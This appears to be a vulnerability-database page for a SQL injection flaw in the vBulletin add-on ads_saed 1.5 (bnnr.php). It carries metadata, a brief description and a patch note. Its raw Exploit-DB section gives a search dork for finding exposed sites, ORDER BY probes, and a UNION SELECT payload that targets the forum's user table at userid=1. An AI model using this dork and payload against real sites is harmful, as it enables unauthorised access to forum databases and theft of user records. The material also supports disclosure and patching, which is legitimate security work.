vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability

vendor:

ads_saed

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ads_saed

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability

A vulnerability exists in vBulletin ads_saed 1.5 (bnnr.php) which allows an attacker to inject malicious SQL queries into the application. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the application.

Source

Exploit-DB raw data:

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

Mail : darkangel_G85@yahoo.com<mailto:darkangel_G85@yahoo.com>
___________________________________

## script name : ads_saed

## d0rk : inurl:"vb/bnnr.php"

## Example :


Go to url : http://server/vb/bnnr.php<http://target.com/vb/bnnr.php>

Exploit in the input "user name" blind injection

user name = ' ORDER BY 15/*

user name = ' ORDER BY 16/*

Now go to Source page  :  " Unknown column '16' in 'order clause'"


exploit :

user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*



# Solution : See here

http://www.traidnt.net/vb/showthread.php?t=1102593

or update new Product



End

IQ-SecuritY FoRuM